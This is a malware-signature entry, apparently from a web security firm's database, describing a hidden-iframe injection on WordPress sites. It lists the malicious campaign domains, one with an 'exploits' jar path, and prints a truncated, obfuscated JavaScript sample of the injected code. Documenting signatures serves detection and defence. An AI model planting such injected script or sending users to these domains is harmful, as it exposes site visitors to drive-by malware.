Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: MW:IFRAME:HD37

Description: A Hidden iframe was detected. This is often used to load malware from infected Wordpress/OpenX sites. Domains used in the malware campaign: http://inlovebot.com/vip.php?s=0
http://wsus-services.com/exploits/des.jar
http://vcerubnit.com/gjrbf78u.php?s=IBB@G
http://tetrall.com/count29.php
http://crazymasya.com/vip.php?s=1
(and others).

Affecting: Any web site (using Wordpress)

Malware dump (sample of malware):

cAopeOld=0.009;copeOld++;copeWoo='';this.copeSon=['mutCope','daceAle'];aleDace={taosAle:false};aleTaos=new Date();function... if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln..

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb